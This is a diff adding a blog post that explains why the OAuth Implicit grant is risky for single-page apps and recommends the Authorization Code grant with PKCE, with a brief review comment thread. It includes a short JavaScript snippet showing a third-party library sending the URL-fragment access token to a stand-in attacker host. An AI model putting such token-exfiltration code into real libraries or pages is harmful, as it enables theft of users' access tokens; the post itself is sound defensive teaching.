site/_posts/2021-02-19-whats-wrong-with-implicit-grant.md

```diff
@@ -0,0 +1,86 @@
+
+`https://piedpiper.com/#token-goes-here`
+
+The token is added to the redirect URL after the `#` symbol, which means it is technically the fragment portion of the URL. What this means is that wherever the OAuth server redirects the browser to, the access token is accessible to any code running in the browser. In other words, to basically everyone. 
+
+To be more precise, the access token is accessible to any and all JavaScript that is running in the browser (including third party libraries). Since this token allows the browser to make API calls and web requests on behalf of the user, having this token be accessible to third-party code is extremely dangerous.
+
+Let's take a dummy example of a single-page web application that uses the Implicit grant:
+
+```html
+// This is dummy code for a SPA that uses the access token
+<html>
+<head>
+  <script type="text/javascript" src="/my-spa-code-1.0.0.js"></script>
+  <script type="text/javascript" src="https://some-third-party-server.com/a-library-found-online-that-looked-cool-0.42.0.js"></script>
+</head>
+<body>
+...
+</body>
+```
+
+This HTML includes two JavaScript libraries:
+
+* The code for the application itself (`my-spa-code-1.0.0.js`).
+* A library we found online that did something cool and we just pulled it in (`a-library-found-online-that-looked-cool-0.42.0.js`).
+
+Let's assume that our code is 100% secure and we don't have to worry about it. The issue here is that the library we pulled in is an unknown quantity. 
+
+It might include other libraries as well. Remember that the DOM is dynamic. Any JavaScript can load any other JavaScript library simply by updating the DOM with more `<script>` tags. Therefore, we have very little chance of ensuring that every other line of code from third-party libraries is secure. 
+
+After all, **do you** audit every javascript library and every dependency of every library every time you deploy your application? 
+
+If a third-party library wanted to steal an access token from our dummy application, all it would need to do is run this code:
+
+```javascript
+if (window.location.hash.contains('access_token')) {
+  fetch('http://steal-those-tokens.com/yummy?hash=' + window.location.hash);
+}
+```
+
+Three lines of code and the access token has been stolen. As you can see, the risk of leaking tokens is far too high to ever consider using the Implicit grant. This is why we recommend that no one ever use this grant.
+
+## How to correctly use OAuth in a SPA
+
+Well, if you are building an awesome React, Angular, Vue or other single page application, what should you use instead of the Implicit grant?
+
+Use the Authorization Code grant. It's secure, safe, well tested, standardized and keeps tokens out of the URL.
+
+In addition to using that grant, take these steps to secure your SPA OAuth flow:
+
+* Use PKCE in your SPA to make sure your application, which can't maintain a secure client secret, is not susceptible to an authorization code interception attack.
```

Comment:
Link to a PKCE article here?

Reply:
We don't have a good one! I just looked around. Will put that on the list to write.